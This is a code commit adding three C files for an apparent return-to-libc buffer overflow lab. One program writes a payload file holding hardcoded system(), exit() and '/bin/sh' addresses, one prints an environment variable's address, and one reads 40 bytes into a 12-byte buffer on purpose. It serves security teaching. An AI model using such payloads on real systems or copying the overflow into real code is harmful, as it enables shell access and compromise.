File tree 3 files changed +61
-0
lines changed
3 files changed +61
-0
lines changed Original file line number Diff line number Diff line change 1+ #include <stdlib.h>
2+ #include <stdio.h>
3+ #include <string.h>
4+ int main (int argc , char * * argv )
5+ {
6+ char buf [40 ];
7+ FILE * badfile ;
8+
9+ badfile = fopen ("./badfile" , "w" );
10+
11+ // 这几个地址是libc库加载到程序空间的地址,可以使用gdb 的 p system 和 p exit 命令得到
12+ // 前提是在使用run命令之后,因为考虑到动态链接库的延迟绑定策略
13+
14+ * (long * ) & buf [32 ] = 0xbffffe7b ; // "/bin/sh"
15+ /*这里为什么从下标24开始,原因可以使用objdump -d retlib 看出来*/
16+ * (long * ) & buf [24 ] = 0xb7e5f430 ; // system()
17+ * (long * ) & buf [28 ] = 0xb7e52fb0 ; // exit()
18+
19+ fwrite (buf , sizeof (buf ), 1 , badfile );
20+ fclose (badfile );
21+ }
Original file line number Diff line number Diff line change 1+ #include <stdio.h>
2+ #include <stdlib.h>
3+
4+ int main (int argc ,char * argv [])
5+ {
6+ char * p = getenv ("MYSH" );
7+ if (NULL == p )
8+ {
9+ printf ("MYSH no exist\n" );
10+ exit (0 );
11+ }
12+ printf ("MYSH address is %p content %s\n" ,p ,p );
13+ return 0 ;
14+ }
Original file line number Diff line number Diff line change 1+ #include <stdlib.h>
2+ #include <stdio.h>
3+ #include <string.h>
4+ #include <stdint.h>
5+
6+ int bof (FILE * badfile )
7+ {
8+ char buffer [12 ];
9+
10+ // vulnerable with buffer overflow attack
11+ fread (buffer , sizeof (char ), 40 , badfile );
12+
13+ return 1 ;
14+ }
15+
16+ int main (int argc , char * * argv )
17+ {
18+ FILE * badfile ;
19+ badfile = fopen ("badfile" , "r" );
20+ bof (badfile );
21+
22+ printf ("Returned Properly\n" );
23+
24+ fclose (badfile );
25+ return 1 ;
26+ }
You can’t perform that action at this time.
0 commit comments